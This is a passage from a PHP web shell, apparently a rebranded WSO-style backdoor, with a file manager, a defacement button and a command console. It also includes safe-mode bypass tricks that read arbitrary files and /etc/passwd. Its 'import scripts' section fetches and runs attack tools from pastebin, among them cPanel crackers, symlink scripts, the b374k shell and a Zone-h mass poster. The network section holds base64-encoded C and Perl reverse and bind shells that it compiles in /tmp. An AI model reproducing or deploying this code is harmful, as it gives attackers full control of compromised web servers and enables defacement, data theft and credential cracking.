725 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
726 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
727 );
728 if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
729 $files[] = array_merge($tmp, array('type' => 'file'));
730 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
731 $links[] = array_merge($tmp, array('type' => 'link'));
732 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
733 $dirs[] = array_merge($tmp, array('type' => 'dir'));
734 }
735 $GLOBALS['sort'] = $sort;
736 function cmp($a, $b) {
737 if($GLOBALS['sort'][0] != 'size')
738 return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
739 else
740 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
741 }
742 usort($files, "cmp");
743 usort($dirs, "cmp");
744 usort($links, "cmp");
745 $files = array_merge($dirs, $links, $files);
746 $l = 0;
747 foreach($files as $f) {
748 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
749 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
750 $l = $l?0:1;
751 }
752 echo '<tr><td colspan=5>
753 <input type=hidden name=a value=\'FilesMan\'>
754 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
755 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
756 <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
757 if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
758 echo '</select> <input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="index.php" size="10"/> <input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add your Deface"></td></tr>
759 </form></table></div>';
760 printFooter();
761}
762
763function actionStringTools() {
764 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
765 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
766 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
767 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
768
769 if(isset($_POST['ajax'])) {
770 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
771 ob_start();
772 if(function_exists($_POST['p1']))
773 echo $_POST['p1']($_POST['p2']);
774 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
775 echo strlen($temp), "\n", $temp;
776 exit;
777 }
778 printHeader();
779 echo '<h1>String conversions</h1><div class=content>';
780 $stringTools = array(
781 'Base64 encode' => 'base64_encode',
782 'Base64 decode' => 'base64_decode',
783 'Url encode' => 'urlencode',
784 'Url decode' => 'urldecode',
785 'Full urlencode' => 'full_urlencode',
786 'md5 hash' => 'md5',
787 'sha1 hash' => 'sha1',
788 'crypt' => 'crypt',
789 'CRC32' => 'crc32',
790 'ASCII to HEX' => 'ascii2hex',
791 'HEX to ASCII' => 'hex2ascii',
792 'HEX to DEC' => 'hexdec',
793 'HEX to BIN' => 'hex2bin',
794 'DEC to HEX' => 'dechex',
795 'DEC to BIN' => 'decbin',
796 'BIN to HEX' => 'bin2hex',
797 'BIN to DEC' => 'bindec',
798 'String to lower case' => 'strtolower',
799 'String to upper case' => 'strtoupper',
800 'Htmlspecialchars' => 'htmlspecialchars',
801 'String length' => 'strlen',
802 );
803 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
804 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
805 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
806 foreach($stringTools as $k => $v)
807 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
808 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
809 if(!empty($_POST['p1'])) {
810 if(function_exists($_POST['p1']))
811 echo htmlspecialchars($_POST['p1']($_POST['p2']));
812 }
813 echo"</pre></div>";
814 printFooter();
815}
816
817function actionFilesTools() {
818 if( isset($_POST['p1']) )
819 $_POST['p1'] = urldecode($_POST['p1']);
820 if(@$_POST['p2']=='download') {
821 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
822 ob_start("ob_gzhandler", 4096);
823 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
824 if (function_exists("mime_content_type")) {
825 $type = @mime_content_type($_POST['p1']);
826 header("Content-Type: ".$type);
827 }
828 $fp = @fopen($_POST['p1'], "r");
829 if($fp) {
830 while(!@feof($fp))
831 echo @fread($fp, 1024);
832 fclose($fp);
833 }
834 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
835
836 }
837 exit;
838 }
839 if( @$_POST['p2'] == 'mkfile' ) {
840 if(!file_exists($_POST['p1'])) {
841 $fp = @fopen($_POST['p1'], 'w');
842 if($fp) {
843 $_POST['p2'] = "edit";
844 fclose($fp);
845 }
846 }
847 }
848 printHeader();
849 echo '<h1>File tools</h1><div class=content>';
850 if( !file_exists(@$_POST['p1']) ) {
851 echo 'File not exists';
852 printFooter();
853 return;
854 }
855 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
856 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
857 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
858 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
859 if( empty($_POST['p2']) )
860 $_POST['p2'] = 'view';
861 if( is_file($_POST['p1']) )
862 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
863 else
864 $m = array('Chmod', 'Rename', 'Touch');
865 foreach($m as $v)
866 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
867 echo '<br><br>';
868 switch($_POST['p2']) {
869 case 'view':
870 echo '<pre class=ml1>';
871 $fp = @fopen($_POST['p1'], 'r');
872 if($fp) {
873 while( !@feof($fp) )
874 echo htmlspecialchars(@fread($fp, 1024));
875 @fclose($fp);
876 }
877 echo '</pre>';
878 break;
879 case 'highlight':
880 if( is_readable($_POST['p1']) ) {
881 echo '<div class=ml1 style="background-color: black;color:black;">';
882 $code = highlight_file($_POST['p1'],true);
883 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
884 }
885 break;
886 case 'chmod':
887 if( !empty($_POST['p3']) ) {
888 $perms = 0;
889 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
890 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
891 if(!@chmod($_POST['p1'], $perms))
892 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
893 else
894 die('<script>g(null,null,null,null,"")</script>');
895 }
896 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
897 break;
898 case 'edit':
899 if( !is_writable($_POST['p1'])) {
900 echo 'File isn\'t writeable';
901 break;
902 }
903 if( !empty($_POST['p3']) ) {
904 @file_put_contents($_POST['p1'],$_POST['p3']);
905 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
906 }
907 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
908 $fp = @fopen($_POST['p1'], 'r');
909 if($fp) {
910 while( !@feof($fp) )
911 echo htmlspecialchars(@fread($fp, 1024));
912 @fclose($fp);
913 }
914 echo '</textarea><input type=submit value=">>"></form>';
915 break;
916 case 'hexdump':
917 $c = @file_get_contents($_POST['p1']);
918 $n = 0;
919 $h = array('00000000<br>','','');
920 $len = strlen($c);
921 for ($i=0; $i<$len; ++$i) {
922 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
923 switch ( ord($c[$i]) ) {
924 case 0: $h[2] .= ' '; break;
925 case 9: $h[2] .= ' '; break;
926 case 10: $h[2] .= ' '; break;
927 case 13: $h[2] .= ' '; break;
928 default: $h[2] .= $c[$i]; break;
929 }
930 $n++;
931 if ($n == 32) {
932 $n = 0;
933 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
934 $h[1] .= '<br>';
935 $h[2] .= "\n";
936 }
937 }
938 echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#red><pre>'.$h[1].'</pre></td><td bgcolor=#red><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
939 break;
940 case 'rename':
941 if( !empty($_POST['p3']) ) {
942 if(!@rename($_POST['p1'], $_POST['p3']))
943 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
944 else
945 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
946 }
947 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
948 break;
949 case 'touch':
950 if( !empty($_POST['p3']) ) {
951 $time = strtotime($_POST['p3']);
952 if($time) {
953 if(@touch($_POST['p1'],$time,$time))
954 die('<script>g(null,null,null,null,"")</script>');
955 else {
956 echo 'Fail!<script>document.mf.p3.value="";</script>';
957 }
958 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
959 }
960 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
961 break;
962 case 'mkfile':
963
964 break;
965 }
966 echo '</div>';
967 printFooter();
968}
969
970function actionSafeMode() {
971 $temp='';
972 ob_start();
973 switch($_POST['p1']) {
974 case 1:
975 $temp=@tempnam($test, 'cx');
976 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
977 echo @file_get_contents($temp);
978 unlink($temp);
979 } else
980 echo 'Sorry... Can\'t open file';
981 break;
982 case 2:
983 $files = glob($_POST['p2'].'*');
984 if( is_array($files) )
985 foreach ($files as $filename)
986 echo $filename."\n";
987 break;
988 case 3:
989 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
990 curl_exec($ch);
991 break;
992 case 4:
993 ini_restore("safe_mode");
994 ini_restore("open_basedir");
995 include($_POST['p2']);
996 break;
997 case 5:
998 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
999 $uid = @posix_getpwuid($_POST['p2']);
1000 if ($uid)
1001 echo join(':',$uid)."\n";
1002 }
1003 break;
1004 case 6:
1005 if(!function_exists('imap_open'))break;
1006 $stream = imap_open($_POST['p2'], "", "");
1007 if ($stream == FALSE)
1008 break;
1009 echo imap_body($stream, 1);
1010 imap_close($stream);
1011 break;
1012 }
1013 $temp = ob_get_clean();
1014 printHeader();
1015 echo '<h1>Safe mode bypass</h1><div class=content>';
1016 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
1017 if($temp)
1018 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1019 echo '</div>';
1020 printFooter();
1021}
1022
1023function actionConsole() {
1024 if(isset($_POST['ajax'])) {
1025 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1026 ob_start();
1027 echo "document.cf.cmd.value='';\n";
1028 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
1029 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
1030 if(@chdir($match[1])) {
1031 $GLOBALS['cwd'] = @getcwd();
1032 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
1033 }
1034 }
1035 echo "document.cf.output.value+='".$temp."';";
1036 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
1037 $temp = ob_get_clean();
1038 echo strlen($temp), "\n", $temp;
1039 exit;
1040 }
1041 printHeader();
1042
1043echo '<script>
1044if(window.Event) window.captureEvents(Event.KEYDOWN);
1045var cmds = new Array("");
1046var cur = 0;
1047function kp(e) {
1048 var n = (window.Event) ? e.which : e.keyCode;
1049 if(n == 38) {
1050 cur--;
1051 if(cur>=0)
1052 document.cf.cmd.value = cmds[cur];
1053 else
1054 cur++;
1055 } else if(n == 40) {
1056 cur++;
1057 if(cur < cmds.length)
1058 document.cf.cmd.value = cmds[cur];
1059 else
1060 cur--;
1061 }
1062}
1063function add(cmd) {
1064 cmds.pop();
1065 cmds.push(cmd);
1066 cmds.push("");
1067 cur = cmds.length-1;
1068}
1069</script>';
1070 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
1071 foreach($GLOBALS['aliases'] as $n => $v) {
1072 if($v == '') {
1073 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1074 continue;
1075 }
1076 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1077 }
1078 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1079 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1080 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
1081 if(!empty($_POST['p1'])) {
1082 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
1083 }
1084 echo '</textarea><input type=text name=cmd style="border-top:1;width:100%;" onkeydown="kp(event);">';
1085 echo '</form></div><script>document.cf.cmd.focus();</script>';
1086 printFooter();
1087}
1088
1089function actionLogout() {
1090 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1091 echo '<title>Get out Now</title><body bgcolor=#000000><center><img src="http://i63.tinypic.com/1108vic.jpg"><br>
1092<style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
1093<span style="color:red;font: 20pt audiowide;">Your are out now :D<br>www.facebook.com/smevkpathan</h2></span></center></body>';
1094}
1095
1096function actionSelfRemove() {
1097 printHeader();
1098 if($_POST['p1'] == 'yes') {
1099 if(@unlink(SELF_PATH))
1100 die('Shell has been removed');
1101 else
1102 echo 'unlink error!';
1103 }
1104 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1105 printFooter();
1106}
1107///my editing start here for tools
1108 function download_remote_file($file_url, $save_to)
1109 {
1110 $content = file_get_contents($file_url);
1111
1112 file_put_contents($save_to, $content);
1113
1114 }
1115 if (isset($_POST['dhanush'])) {
1116 download_remote_file('http://pastebin.com/raw.php?i=U9nqEgRN', realpath("./") . '/dhanush.php');
1117 header("location:dhanush.php");
1118
1119 }
1120 if (isset($_POST['SymlinkbySmevk'])) {
1121 download_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath("./") . '/SymlinkbySmevk.php');
1122 header("location:SymlinkbySmevk.php");
1123
1124 }
1125 if (isset($_POST['SymlinkbyCheetah'])) {
1126 download_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath("./") . '/SymlinkbyCheetah.php');
1127 header("location:SymlinkbyCheetah.php");
1128
1129 }
1130 if (isset($_POST['SymlinkbyTorjan'])) {
1131 download_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath("./") . '/sym.py');
1132 echo "<script>alert('Script is here /sym.py execute it from there.Type in console (Python sym.py)')</script>";
1133
1134
1135 }
1136 if (isset($_POST['CpanelCracker'])) {
1137 download_remote_file('http://pastebin.com/raw.php?i=zYxsP0MH', realpath("./") . '/CpanelCracker.php');
1138 header("location:CpanelCracker.php");
1139
1140 }
1141 if (isset($_POST['Dblogin'])) {
1142 download_remote_file('http://pastebin.com/raw.php?i=Q52G9kjJ', realpath("./") . '/Dblogin.php');
1143 header("location:Dblogin.php");
1144
1145 }
1146 if (isset($_POST['CpanelkbyGujjar'])) {
1147 download_remote_file('http://pastebin.com/raw.php?i=NM9SD9bV', realpath("./") . '/CpanelkbyGujjar.php');
1148 header("location:CpanelkbyGujjar.php");
1149
1150 }
1151 if (isset($_POST['b374k'])) {
1152 download_remote_file('http://pastebin.com/raw.php?i=1iDZfjZ9', realpath("./") . '/b374k.php');
1153 header("location:b374k.php");
1154
1155 }
1156 if (isset($_POST['ZonehMassPoster'])) {
1157 download_remote_file('http://pastebin.com/raw.php?i=mDXnSnj2', realpath("./") . '/ZonehMassPoster.php');
1158 header("location:ZonehMassPoster.php");
1159
1160 }
1161 if (isset($_POST['Whmcs'])) {
1162 download_remote_file('http://pastebin.com/raw.php?i=K0KQWUCk', realpath("./") . '/Whmcs.php');
1163 header("location:Whmcs.php");
1164
1165 }
1166
1167
1168
1169
1170
1171
1172function actionImportScripts() {
1173 printHeader();
1174echo '<table border="1px" align="center" id ="Smevktools" cellpadding="10" border-color"green"><tr><td>Just click and get the Script :).</td><tr><td>
1175<form action ="" method="post">
1176
1177 <input type = "submit" name="dhanush" value ="Dhanush Shell"></td></tr>';
1178echo '<td><form action ="" method="post"><input type = "submit" name="SymlinkbySmevk" value ="Symlink Script By SmEvK_PaThAn"></a></td></tr>';
1179echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyCheetah" value ="Symlink By Kashmiri Cheetah"></a></td></tr>';
1180echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyTorjan" value ="Symlink Python Script By Torjan"></a></td></tr>';
1181echo '<tr><td><form action ="" method="post"><input type = "submit" name="CpanelCracker" value ="Cpanel Cracker"></a></td></tr>';
1182echo '<tr><td><form action ="" method="post"><input type = "submit" name="Dblogin" value ="Database Login Script"></a></td></tr>';
1183echo '<tr><td><form action ="" method="post"><input type = "submit" name="CpanelkbyGujjar" value ="Gujjar Pcp Cpanel Cracker"></a></td></tr>';
1184echo '<tr><td><form action ="" method="post"><input type = "submit" name="b374k" value ="b374k Shell"></a></td></tr>';
1185echo '<tr><td><form action ="" method="post"><input type = "submit" name="ZonehMassPoster" value ="Zone-h Mass Poster"></a></td></tr>';
1186echo '<tr><td><form action ="" method="post"><input type = "submit" name="Whmcs" value ="WHMCS KILLER V3"></a></td></tr>';
1187
1188
1189
1190
1191
1192
1193 printFooter();
1194}
1195
1196
1197function actionNetwork() {
1198 printHeader();
1199 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1200 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1201 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1202 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1203
1204 echo '<h1>Network tools</h1><div class=content>
1205 <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
1206 <br /><span>Bind port to /bin/sh</span><br/>
1207 Port: <input type=\'text\' name=\'port\' value=\'443\'> Password: <input type=\'text\' name=\'pass\' value=\'Pakistan Haxors\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
1208 </form>
1209 <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
1210 <br /><br /><span>Back-connect to</span><br/>
1211 Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'443\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>">
1212 </form><br>';
1213 if(isset($_POST['p1'])) {
1214 function cf($f,$t) {
1215 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1216 if($w) {
1217 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1218 @fclose($w);
1219 }
1220 }
1221 if($_POST['p1'] == 'bpc') {
1222 cf("/tmp/bp.c",$bind_port_c);
1223 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
